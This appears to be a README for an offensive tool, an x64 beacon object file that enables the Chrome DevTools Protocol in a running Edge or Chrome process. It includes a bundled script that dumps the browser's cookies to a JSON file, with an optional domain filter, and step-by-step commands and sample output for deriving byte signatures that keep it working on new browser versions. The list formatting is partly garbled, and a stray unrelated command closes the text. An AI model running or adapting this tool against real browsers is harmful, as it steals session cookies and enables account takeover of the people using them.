CDP-Enable-BOF is an x64 BOF that enables the Chrome DevTools Protocol in a
running msedge.exe or chrome.exe process
Based on CDP-Enable and Modern Session Hijacking by Living off the DevTools Protocol by Cedric Van Bockhaven
cdp_enable <edge|chrome> <9000-65535>
msedge.dll or chrome.dll)StartRemoteDebuggingServeroperator newTCPServerSocketFactory::CreateForHttpServerTCPServerSocketFactory vtableStartRemoteDebuggingServer on the requested portRunning the final internal call on the browser UI thread is the key trick that makes this reliable in the presence of CFG / TLS / CET-sensitive execution.
Use the bundled Python script to prove CDP is up and reachable:
python .\grab_cookies.py --port 9001 --output cookies.json
If CDP is working, the script will:
http://127.0.0.1:9001/json/versioncookies.jsonOptional domain filter:
python .\grab_cookies.py --port 9001 --domain microsoft.com --output ms_cookies.json
Issue: "Failed to resolve symbol signatures"
Cause: Edge version mismatch - signatures are version-specific Solution: See "Finding New Signatures" below
Tested Chrome Version: 147.0.7727.102 Tested Edge Version: 147.0.3912.98
These scripts are used to find new signatures and supporting runtime inputs for updated browser versions:
StartRemoteDebuggingServeroperator newTCPServerSocketFactory::CreateForHttpServerTCPServerSocketFactory vtable informationCopy the DLL from the browser build you are targeting into the working directory. On this machine, the installed DLLs live under versioned subdirectories:
Copy-Item "C:\Program Files\Google\Chrome\Application\147.0.7727.138\chrome.dll" .
Copy-Item "C:\Program Files (x86)\Microsoft\Edge\Application\147.0.3912.98\msedge.dll" .
For Chrome:
& 'C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\symchk.exe' /v chrome.dll /s srv*C:\symbols*https://chromium-browser-symsrv.commondatastorage.googleapis.com
For Edge:
symchk /v /ocx edge-symchk.txt /s SRV*c:\symbols*https://msdl.microsoft.com/download/symbols .\msedge.dll
Find StartRemoteDebuggingServer:
python .\find_start_server.py .\chrome.dll <full path to chrome.dll.pdb>
python .\find_start_server.py .\msedge.dll <full path to msedge.dll.pdb>
Example Edge output:
{
"binary": "C:\\Users\\antrovmp\\Desktop\\CDP-Enable-BOF\\msedge.dll",
"pdb": "c:\\symbols\\msedge.dll.pdb\\23DB3E4A1AB4F3B44C4C44205044422E1\\msedge.dll.pdb",
"symbol": "?StartRemoteDebuggingServer@DevToolsAgentHost@content@@SAXV?$unique_ptr@VDevToolsSocketFactory@content@@U?$default_delete@VDevToolsSocketFactory@content@@@__Cr@std@@@__Cr@std@@AEBVFilePath@base@@1W4RemoteDebuggingServerMode@12@@Z",
"signature_rva": "0x0321EAC2",
"signature_va": "0x000000018321EAC2",
"signature_length": 30,
"signature_hex": "41 57 41 56 41 54 56 57 55 53 48 83 EC 50 44 89 CD 4C 89 C3 48 89 D7 48 89 CE 48 8B 05 5D",
"signature_c_initializer": "0x41, 0x57, 0x41, 0x56, 0x41, 0x54, 0x56, 0x57, 0x55, 0x53, 0x48, 0x83, 0xEC, 0x50, 0x44, 0x89, 0xCD, 0x4C, 0x89, 0xC3, 0x48, 0x89, 0xD7, 0x48, 0x89, 0xCE, 0x48, 0x8B, 0x05, 0x5D",
"copy_to_code": "Use this for EDGE_START_SIG if analyzing msedge.dll, or CHROME_START_SIG if analyzing chrome.dll.",
"text_hits": 1
}
Copy signature_c_initializer into the start signature array in
cdp_enable_bof.c:
EDGE_START_SIG at line 168EDGE_START_MASK at line 181CHROME_START_SIG at line 194CHROME_START_MASK at line 207For Edge, replace the bytes in EDGE_START_SIG with the new
signature_c_initializer. For Chrome, do the same with CHROME_START_SIG.
Find the supporting inputs:
python .\find_cdp_inputs.py .\chrome.dll <full path to chrome.dll.pdb>
python .\find_cdp_inputs.py .\msedge.dll <full path to msedge.dll.pdb>
Example Edge output:
{
"binary": "msedge.dll",
"operator_new": {
"rva": "0x036335D8",
"va": "0x00000001836335D8",
"signature": "40 53 48 83 EC 20 48 8B D9 EB ?? 48 8B CB E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B CB",
"copy_to_code": "OPERATOR_NEW_SIG"
},
"tcp_server_socket_factory": {
"create_for_http_server": {
"rva": "0x016C7310",
"va": "0x00000001816C7310",
"signature_hex": "48 89 D0 0F B7 51 08 48",
"signature_c_initializer": "0x48, 0x89, 0xD0, 0x0F, 0xB7, 0x51, 0x08, 0x48",
"copy_to_code": "EDGE_ENTRY1_SIG",
"vtable_rva": "0x0FBDCA70",
"vtable_va": "0x000000018FBDCA70"
},
"layout": {
"size": 16,
"vtable_offset": 0,
"port_offset": 8
}
}
}
Important fields and where they go:
operator_new.copy_to_code -> OPERATOR_NEW_SIG at line 221tcp_server_socket_factory.create_for_http_server.copy_to_code ->
EDGE_ENTRY1_SIG at line 242 or CHROME_ENTRY1_SIG at line 246tcp_server_socket_factory.layout is a sanity check for the object layout the
BOF expects: size 16, vtable offset 0, port offset 8The script also derives the TCPServerSocketFactory vtable location. The BOF
still resolves that through the VTABLE_ENTRY0_SIG / VTABLE_ENTRY0_MASK
helper at lines 228 and 234 if that helper drifts.
msedge.exe and chrome.exeCreateForHttpServer
signature to avoid false positives across patch-level browser changes$ claude mcp add CDP-Enable-BOF \
-- python -m otcore.mcp_server <graph>